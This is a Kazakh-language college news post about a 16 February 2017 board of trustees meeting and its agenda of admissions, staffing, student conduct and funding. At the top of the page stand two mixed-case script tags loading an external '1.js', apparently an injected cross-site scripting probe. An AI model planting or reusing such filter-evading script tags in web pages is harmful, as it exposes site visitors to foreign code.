<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.02.2017

Ж.Мусин атындағы педагогикалық колледжінің салтанат залында 16 ақпан күні сағат 15.00-де кезекті қамқоршылық кеңес өтті. Қамқоршылық кеңеске ұжым, колледж студенттерінің ата-аналары, Көкшетау қаласы бойынша әлеуметтік серіктестіктер, топ белсенділері мен ұйымдастырушылар қатысты. Кеңес негізгі екі бөлімнен тұрды. Қарастырылған мәселелер төмендегідей болды:

1. ҚР тұрғын үймен қамтамасыз ету мәселесі бойынша арнайы мамандардың кеңесі;

2. ҚР білім беру мазмұнын жаңарту жағдайында колледждің қолданбалы бакалавриат жүйесіне көшу мәселесі;

3. Колледждегі студент қыздардың өнегелік тәрбиесінде кеткен кемшіліктер және оны жою жолдары;

4. Колледждің кәсіптік бағдар беру жоспарын талқылау және бекіту. 4 курс студенттерінің жоғарғы оқуға түсу мақсатындағы тест тапсыру өзгерістері;

5. Мемлекеттік жалпыға міндетті білім беру стандартын орындауға колледж оқытушылары қызметінің сапалық деңгейі;

6. Колледждің республикалық оқу-әдістемелік бірлестігі бойынша құрылған жұмыс топтары жетекшілерінің есептері;

7. 2017-2018 оқу жылына студенттерді қабылдау комиссиясының жауапты хатшысын және комиссия құрамын бекіту;

8. Лауазымдық нұсқаулықтарға өзгеріс енгізу, талқылау, бекіту;

9. Колледждегі әлеуметтік-тұрмыстық жағдайларға байланысты мәселелерді реттеу туралы:

- еңбекке жарамсыз парағына сәйкес төлемақыны реттеу;

- колледж сыртқы ортасының мерейтойлық құттықтауларына, мәдени іс-шараларға қаражат бөлу мәселесі.

Осы аталған мәселелер бойынша жауапты тұлғалар сөз сөйлеп, барлық айтылған ойлар мен пікірлер ортамызда ашық әрі демократиялық түрде талқыланып, әлеуметтік серіктестіктер, студенттер және ата-аналар өз ой-пікірлерін білдірді. Студенттер тарапынан І және ІІ курс студенттерін әлеуметтік желілерден алшақтату, интернет арбауына кішкене болса да тосқауыл қою мақсатында өз ұсыныстарын ортаға салды.

Просмотров: 651


Пікір қосу



Деректерді қолтаңбаға қосу